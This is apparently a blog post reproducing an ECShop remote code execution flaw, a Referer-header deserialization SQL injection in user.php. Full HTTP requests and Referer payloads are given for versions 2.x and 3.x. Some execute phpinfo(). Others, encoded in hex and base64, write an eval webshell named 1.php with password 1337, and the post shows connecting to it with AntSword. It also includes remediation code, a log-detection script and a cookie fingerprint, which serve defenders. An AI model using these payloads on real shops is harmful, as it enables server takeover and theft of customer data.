ECShop Remote Code Execution Vulnerability (All Versions)

Posted by 看不尽的尘埃 on September 25, 2019

Preface

I've recently been writing fingerprint rules and vulnerability detection and exploitation rules for my company, so vulnerability reproduction posts will be coming more frequently.

0x00 Vulnerability Overview

  • Name: ECShop remote code execution, all versions
  • CVE: N/A
  • Published: 2018-09-1
  • Description: this vulnerability can lead directly to compromise of the web server; an attacker can obtain server privileges through a web request alone. It is simple to exploit and highly damaging.
  • Affected versions: all 2.x and 3.x releases
  • Remediation: modify the vulnerable code in include/lib_insert.php so that $arr[id] and $arr[num] are forcibly cast to integers before use
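To make the remediation concrete, here is an added illustration of the pattern behind it, written for this article and not taken from ECShop's include/lib_insert.php. The function names, the table name ecs_ad and the column names are assumptions; the point is the contrast between interpolating the deserialized values unchanged and casting them to integers first (PHP 7+ is assumed for the type declarations).

```php
<?php
// Added example, not ECShop's own code. Function and table names are assumed.

// Vulnerable pattern: 'id' and 'num' come from a deserialized array and are
// concatenated into SQL unchanged, so any non-integer content lands in the query.
function insert_ads_query_vulnerable(array $arr): string
{
    return "SELECT ad_id, ad_code FROM ecs_ad"
         . " WHERE position_id = '" . $arr['id'] . "'"
         . " ORDER BY RAND() LIMIT " . $arr['num'];
}

// Hardened pattern (the fix the article recommends): force both values to
// integers before they reach SQL, and clamp them to a sane range so a bad
// value degrades to a harmless query instead of a changed one.
function insert_ads_query_fixed(array $arr): string
{
    $id  = (int) ($arr['id']  ?? 0);
    $num = (int) ($arr['num'] ?? 1);
    if ($id < 0) {
        $id = 0;
    }
    if ($num < 1) {
        $num = 1;
    }
    return "SELECT ad_id, ad_code FROM ecs_ad"
         . " WHERE position_id = " . $id
         . " ORDER BY RAND() LIMIT " . $num;
}

// Constructed sample inputs: one benign, one whose values are not plain
// integers (the shape the Referer payloads in this article take).
$benign   = ['id' => '3', 'num' => '2'];
$tampered = ['id' => "' /*", 'num' => "*/ union select 1,2,3-- -"];

// With the vulnerable builder the quote and comment markers survive into the SQL.
echo insert_ads_query_vulnerable($tampered), PHP_EOL;
// With the fixed builder both values cast to 0 and are clamped (id 0, LIMIT 1).
echo insert_ads_query_fixed($tampered), PHP_EOL;
// A normal request is unaffected by the cast.
echo insert_ads_query_fixed($benign), PHP_EOL;
```

The cast is the essential part: (int) on a string that does not begin with digits yields 0, so nothing from the attacker-controlled string can reach the SQL text. Clamping is a belt-and-braces addition so that an out-of-range value produces a predictable query rather than an error page that leaks information.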

0x01 Environment Setup

I used an online lab environment for this.

[screenshot]

2.x PoC

Send a request to user.php with the Referer header replaced or added; this PoC executes phpinfo():

POST /user.php HTTP/1.1
Host: 6f20dc3e7e2f04b19ce2d861e7fd7cc0.n2.vsgo.cloud:18570
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:110:"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:4:"' /*";}554fcae493e564ee0dc75bdf2ebf94ca

The screenshot below shows that phpinfo was executed successfully: [screenshot]

2.x EXP

The Referer below writes a one-line webshell, creating 1.php in the site root with password 1337. If you want to change it, you can generate a custom backdoor and password with the PHP code in the lab's write-up:

POST /user.php HTTP/1.1
Host: deb51ea82b23814b0aa6b5bc05268bfb.n2.vsgo.cloud:16741
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ECS_ID=99a65b781f6f0322d02e278e788c798dbe35f4fc; ECS[visit_times]=1
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}

The screenshot below shows that although there appears to be an error, the webshell was still written successfully: [screenshot]

Connecting with AntSword (中国蚁剑) works without any problem: [screenshot]

3.x PoC

Since this affects every version, let's look at the 3.x PoC, which as before executes phpinfo:

Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

3.x EXP

The 3.x EXP likewise creates 1.php in the site root with password 1337.

Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:289:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

0x02 Fingerprint

I noticed that the Cookie contains a key field, ECS_ID; for now I'll treat this as the web fingerprint.
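From the defender's side, the same two traits can be turned into a log check: the ECS_ID cookie identifies an ECShop instance, and the Referer values in the requests above share a recognisable shape (a 32-character hex string, the literal "ads|", then a PHP serialized array "a:N:{"). The following is an added example written for this article, not code from the original post or from ECShop; the tab-separated log format, the function names and the placeholder hash values are constructed for the demonstration.

```php
<?php
// Added detection example, not part of the original post. Log format,
// function names and all sample values are constructed assumptions.

// A Referer is flagged when it carries a serialized PHP array behind a
// 32-hex prefix and the "ads|" marker, the shape seen in the PoCs above.
// The trailing hash is not matched because it is not always present.
function referer_is_suspicious(string $referer): bool
{
    return (bool) preg_match('/[0-9a-f]{32}ads\|a:\d+:\{/i', $referer);
}

// Scan constructed log lines of the form:
//   METHOD<TAB>PATH<TAB>REFERER<TAB>COOKIE
// and return one record per flagged request, noting whether the request
// also carried the ECS_ID cookie that marks an ECShop deployment.
function scan_access_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        $fields = explode("\t", $line, 4);
        if (count($fields) !== 4) {
            continue; // malformed line; skip rather than guess
        }
        [$method, $path, $referer, $cookie] = $fields;
        if (!referer_is_suspicious($referer)) {
            continue;
        }
        $hits[] = [
            'line'   => $n + 1,
            'method' => $method,
            'path'   => $path,
            'ecshop' => stripos($cookie, 'ECS_ID=') !== false,
        ];
    }
    return $hits;
}

// Constructed sample lines. The 32 'a' characters stand in for a hash;
// they are placeholders, not values from any real system.
$fakeHash = str_repeat('a', 32);
$sample = [
    "GET\t/index.php\thttps://shop.example.test/\tECS_ID=placeholder; ECS[visit_times]=1",
    "POST\t/user.php\t{$fakeHash}ads|a:2:{s:3:\"num\";s:4:\"test\";s:2:\"id\";s:1:\"1\";}{$fakeHash}\tECS_ID=placeholder",
    "POST\t/user.php\thttps://shop.example.test/login\tsessionid=placeholder",
];

print_r(scan_access_log($sample));
```

Only the second line is reported, with 'ecshop' => true because its cookie carries ECS_ID. A benign Referer on an ECShop site (line one) is not flagged, and a suspicious-looking Referer without the fingerprint cookie would still be reported but marked 'ecshop' => false, which is useful for prioritising alerts.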

0x03 Summary

I realised I know too little about PHP serialization and deserialization; I need to study PHP deserialization properly over the weekend to deepen my understanding of PHP serialization and deserialization.